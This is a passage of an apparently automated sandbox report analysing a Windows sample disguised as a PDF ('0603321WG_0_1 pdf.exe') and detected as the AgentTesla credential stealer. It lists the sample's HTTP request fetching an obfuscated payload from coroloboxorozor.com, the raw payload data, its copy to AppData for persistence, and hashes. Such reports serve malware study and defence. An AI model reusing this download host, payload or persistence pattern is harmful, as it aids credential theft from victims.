Set-Cookie: __cfduid=da5ed9202205d82c93dc7ad00ba5fc2c21614069162; expires=Thu, 25-Mar-21 08:32:42 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax
Last-Modified: Mon, 22 Feb 2021 21:10:03 GMT
Vary: Accept-Encoding
X-Frame-Options: SAMEORIGIN
CF-Cache-Status: DYNAMIC
cf-request-id: 086f9df82c0000d8c1c9a94000000001
Report-To: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=QOb3Deeon02wuxkzT0wxtDetJ8%2Btqb92d4RT9LdOygqtVVXKCxTgvPUI19Pk4fG%2BlSCWLUfWlOjpqNby35Op3n4DVuOPQAcYVO%2Bi1Ncru%2FMu5jPW"}],"group":"cf-nel"}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 625f9906ac11d8c1-AMS
                                                      Data Raw: 65 63 31 0d 0a 3c 70 3e 4d 4d 6f 69 7a 6f 70 62 62 6f 7a 6f 4c 6f 7a 6f 7a 6f 7a 6f 62 6f 7a 6f 7a 6f 7a 6f 58 4b 4b 6f 58 4b 4b 6f 7a 6f 7a 6f 70 52 62 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 49 62 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 70 58 52 6f 7a 6f 7a 6f 7a 6f 70 62 6f 4c 70 6f 70 52 49 6f 70 62 6f 7a 6f 70 52 7a 6f 69 6f 58 7a 4b 6f 4c 4c 6f 70 52 62 6f 70 6f 4d 49 6f 58 7a 4b 6f 4c 4c 6f 52 62 6f 70 7a 62 6f 70 7a 4b 6f 70 70 4b 6f 4c 58 6f 70 70 58 6f 70 70 62 6f 70 70 70 6f 70 7a 4c 6f 70 70 62 6f 69 4d 6f 70 7a 69 6f 4c 58 6f 69 69 6f 69 4d 6f 70 70 7a 6f 70 70 7a 6f 70 70 70 6f 70 70 49 6f 4c 58 6f 69 52 6f 70 7a 70 6f 4c 58 6f 70 70 62 6f 70 70 4d 6f 70 70 7a 6f 4c 58 6f 70 7a 4b 6f 70 70 7a 6f 4c 58 6f 49 52 6f 4d 69 6f 52 4c 6f 4c 58 6f 70 7a 69 6f 70 70 70 6f 70 7a 7a 6f 70 7a 70 6f 62 49 6f 70 4c 6f 70 4c 6f 70 7a 6f 4c 49 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 52 7a 6f 49 69 6f 7a 6f 7a 6f 4d 49 6f 70 6f 4c 6f 7a 6f 4d 49 6f 70 62 58 6f 62 70 6f 70 52 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 58 58 62 6f 7a 6f 4c 62 6f 7a 6f 70 70 6f 70 6f 52 7a 6f 7a 6f 7a 6f 70 70 52 6f 62 6f 7a 6f 7a 6f 49 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 58 4c 52 6f 70 62 52 6f 62 6f 7a 6f 7a 6f 4c 58 6f 7a 6f 7a 6f 7a 6f 70 49 7a 6f 62 6f 7a 6f 7a 6f 7a 6f 7a 6f 70 58 52 6f 7a 6f 4c 58 6f 7a 6f 7a 6f 7a 6f 58 6f 7a 6f 7a 6f 62 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 62 6f 7a 6f 7a 6f 7a 6f 7a
                                                      Data Ascii: ec1<p>MMoizopbbozoLozozozobozozozoXKKoXKKozozopRbozozozozozozozoIbozozozozozozozozozozozozozozozozozozozozozozozozozozozozozozozozozozozopXRozozozopboLpopRIopbozopRzoioXzKoLLopRbopoMIoXzKoLLoRbopzbopzKoppKoLXoppXoppbopppopzLoppboiMopzioLXoiioiMoppzoppzopppoppIoLXoiRopzpoLXoppboppMoppzoLXopzKoppzoLXoIRoMioRLoLXopziopppopzzopzpobIopLopLopzoLIozozozozozozozoRzoIiozozoMIopoLozoMIopbXobpopRzozozozozozozozozoXXbozoLbozoppopoRzozozoppRobozozoIozozozozozozoXLRopbRobozozoLXozozozopIzobozozozozopXRozoLXozozozoXozozobozozozozozozozobozozozoz


                                                      Session ID | Source IP   | Source Port | Destination IP | Destination Port | Process
                                                      2          | 192.168.2.4 | 49763       | 172.67.172.17  | 80               | C:\Users\user\Desktop\0603321WG_0_1 pdf.exe
                                                      Timestamp                           | kBytes transferred | Direction | Data
                                                      Feb 23, 2021 09:32:51.002384901 CET | 5498               | OUT       | GET /base/008D1C43D45C0A742A0D32B591796DBD.html HTTP/1.1
                                                      Host: coroloboxorozor.com
                                                      Connection: Keep-Alive
                                                      Feb 23, 2021 09:32:51.121426105 CET | 5519               | IN        | HTTP/1.1 200 OK
                                                      Date: Tue, 23 Feb 2021 08:32:51 GMT
                                                      Content-Type: text/html
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Set-Cookie: __cfduid=d81affeca7cd9eb6e8b1748d7d3df39cb1614069171; expires=Thu, 25-Mar-21 08:32:51 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax
                                                      Last-Modified: Mon, 22 Feb 2021 21:10:03 GMT
                                                      Vary: Accept-Encoding
                                                      X-Frame-Options: SAMEORIGIN
                                                      CF-Cache-Status: DYNAMIC
                                                      cf-request-id: 086f9e1b6000000bc17caf0000000001
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=%2B8ppNaQ2nqbApn6T%2BBzyLTDWm7simwrXlHrCsCE0K4w8ApGSsTt5IrIzMiVXMj%2BFy9Ir8ngZyuCpZy7Oud78aoUSF4hOwUfVPo3jGdJKCCg6iX9G"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 625f993f093c0bc1-AMS
                                                      Data Ascii: 7c95<p>MMoizopbbozoLozozozobozozozoXKKoXKKozozopRbozozozozozozozoIbozozozozozozozozozozozozozozozozozozozozozozozozozozozozozozozozozozozopXRozozozopboLpopRIopbozopRzoioXzKoLLopRbopoMIoXzKoLLoRbopzbopzKoppKoLXoppXoppbopppopzLoppboiMopzioLXoiioiMoppzoppzopppoppIoLXoiRopzpoLXoppboppMoppzoLXopzKoppzoLXoIRoMioRLoLXopziopppopzzopzpobIopLopLopzoLIozozozozozozozoRzoIiozozoMIopoLozoMIopbXobpopRzozozozozozozozozoXXbozoLbozoppopoRzozozoppRobozozoIozozozozozozoXLRopbRobozozoLXozozozopIzobozozozozopXRozoLXozozozoXozozobozozozozozozozobozozozozo


                                                      Code Manipulations

                                                      Statistics

                                                      Behavior


                                                      System Behavior

                                                      General

                                                      Start time:09:31:53
                                                      Start date:23/02/2021
                                                      Path:C:\Users\user\Desktop\0603321WG_0_1 pdf.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:'C:\Users\user\Desktop\0603321WG_0_1 pdf.exe'
                                                      Imagebase:0x810000
                                                      File size:30816 bytes
                                                      MD5 hash:9844048A2B7081D223139F100B0FF486
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET
                                                      Yara matches:
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.679176630.00000000047A2000.00000004.00000001.sdmp, Author: Joe Security
                                                      Reputation:low

                                                      General

                                                      Start time:09:32:00
                                                      Start date:23/02/2021
                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:'C:\Windows\System32\cmd.exe' /c timeout 1
                                                      Imagebase:0x11d0000
                                                      File size:232960 bytes
                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      General

                                                      Start time:09:32:00
                                                      Start date:23/02/2021
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff724c50000
                                                      File size:625664 bytes
                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      General

                                                      Start time:09:32:00
                                                      Start date:23/02/2021
                                                      Path:C:\Windows\SysWOW64\timeout.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:timeout 1
                                                      Imagebase:0xf10000
                                                      File size:26112 bytes
                                                      MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      General

                                                      Start time:09:32:04
                                                      Start date:23/02/2021
                                                      Path:C:\Users\user\Desktop\0603321WG_0_1 pdf.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Users\user\Desktop\0603321WG_0_1 pdf.exe
                                                      Imagebase:0x7c0000
                                                      File size:30816 bytes
                                                      MD5 hash:9844048A2B7081D223139F100B0FF486
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET
                                                      Yara matches:
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.909029563.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.913675806.0000000002AC1000.00000004.00000001.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.913675806.0000000002AC1000.00000004.00000001.sdmp, Author: Joe Security
                                                      Reputation:low

                                                      General

                                                      Start time:09:32:06
                                                      Start date:23/02/2021
                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7004 -s 276
                                                      Imagebase:0xbb0000
                                                      File size:434592 bytes
                                                      MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET
                                                      Reputation:high

                                                      General

                                                      Start time:09:32:39
                                                      Start date:23/02/2021
                                                      Path:C:\Users\user\AppData\Roaming\NewApp\NewApp.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:'C:\Users\user\AppData\Roaming\NewApp\NewApp.exe'
                                                      Imagebase:0xe40000
                                                      File size:30816 bytes
                                                      MD5 hash:9844048A2B7081D223139F100B0FF486
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET
                                                      Yara matches:
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000002.850762818.00000000050CD000.00000004.00000001.sdmp, Author: Joe Security
                                                      Antivirus matches:
                                                      • Detection: 100%, Joe Sandbox ML
                                                      • Detection: 22%, ReversingLabs
                                                      Reputation:low

                                                      General

                                                      Start time:09:32:47
                                                      Start date:23/02/2021
                                                      Path:C:\Users\user\AppData\Roaming\NewApp\NewApp.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:'C:\Users\user\AppData\Roaming\NewApp\NewApp.exe'
                                                      Imagebase:0x170000
                                                      File size:30816 bytes
                                                      MD5 hash:9844048A2B7081D223139F100B0FF486
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET
                                                      Yara matches:
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000013.00000002.879172967.00000000064E4000.00000004.00000001.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000013.00000002.883671585.0000000006979000.00000004.00000001.sdmp, Author: Joe Security
                                                      Reputation:low

                                                      General

                                                      Start time:09:32:58
                                                      Start date:23/02/2021
                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:'C:\Windows\System32\cmd.exe' /c timeout 1
                                                      Imagebase:0x11d0000
                                                      File size:232960 bytes
                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      General

                                                      Start time:09:32:58
                                                      Start date:23/02/2021
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff724c50000
                                                      File size:625664 bytes
                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      General

                                                      Start time:09:32:58
                                                      Start date:23/02/2021
                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:'C:\Windows\System32\cmd.exe' /c timeout 1
                                                      Imagebase:0x11d0000
                                                      File size:232960 bytes
                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      General

                                                      Start time:09:32:59
                                                      Start date:23/02/2021
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff724c50000
                                                      File size:625664 bytes
                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      General

                                                      Start time:09:32:59
                                                      Start date:23/02/2021
                                                      Path:C:\Windows\SysWOW64\timeout.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:timeout 1
                                                      Imagebase:0xf10000
                                                      File size:26112 bytes
                                                      MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      General

                                                      Start time:09:32:59
                                                      Start date:23/02/2021
                                                      Path:C:\Windows\SysWOW64\timeout.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:timeout 1
                                                      Imagebase:0xf10000
                                                      File size:26112 bytes
                                                      MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      General

                                                      Start time:09:33:03
                                                      Start date:23/02/2021
                                                      Path:C:\Users\user\AppData\Roaming\NewApp\NewApp.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Users\user\AppData\Roaming\NewApp\NewApp.exe
                                                      Imagebase:0xf30000
                                                      File size:30816 bytes
                                                      MD5 hash:9844048A2B7081D223139F100B0FF486
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET
                                                      Yara matches:
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001B.00000002.912580946.0000000003191000.00000004.00000001.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001B.00000002.912580946.0000000003191000.00000004.00000001.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001B.00000002.909001517.0000000000402000.00000040.00000001.sdmp, Author: Joe Security

                                                      General

                                                      Start time:09:33:03
                                                      Start date:23/02/2021
                                                      Path:C:\Users\user\AppData\Roaming\NewApp\NewApp.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Users\user\AppData\Roaming\NewApp\NewApp.exe
                                                      Imagebase:0xce0000
                                                      File size:30816 bytes
                                                      MD5 hash:9844048A2B7081D223139F100B0FF486
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET
                                                      Yara matches:
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001C.00000002.808427575.0000000003011000.00000004.00000001.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001C.00000002.808427575.0000000003011000.00000004.00000001.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001C.00000002.806272942.0000000000402000.00000040.00000001.sdmp, Author: Joe Security

                                                      General

                                                      Start time:09:33:06
                                                      Start date:23/02/2021
                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7056 -s 1464
                                                      Imagebase:0xbb0000
                                                      File size:434592 bytes
                                                      MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET

                                                      General

                                                      Start time:09:33:08
                                                      Start date:23/02/2021
                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4972 -s 1896
                                                      Imagebase:0xbb0000
                                                      File size:434592 bytes
                                                      MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET

                                                      Disassembly

                                                      Code Analysis
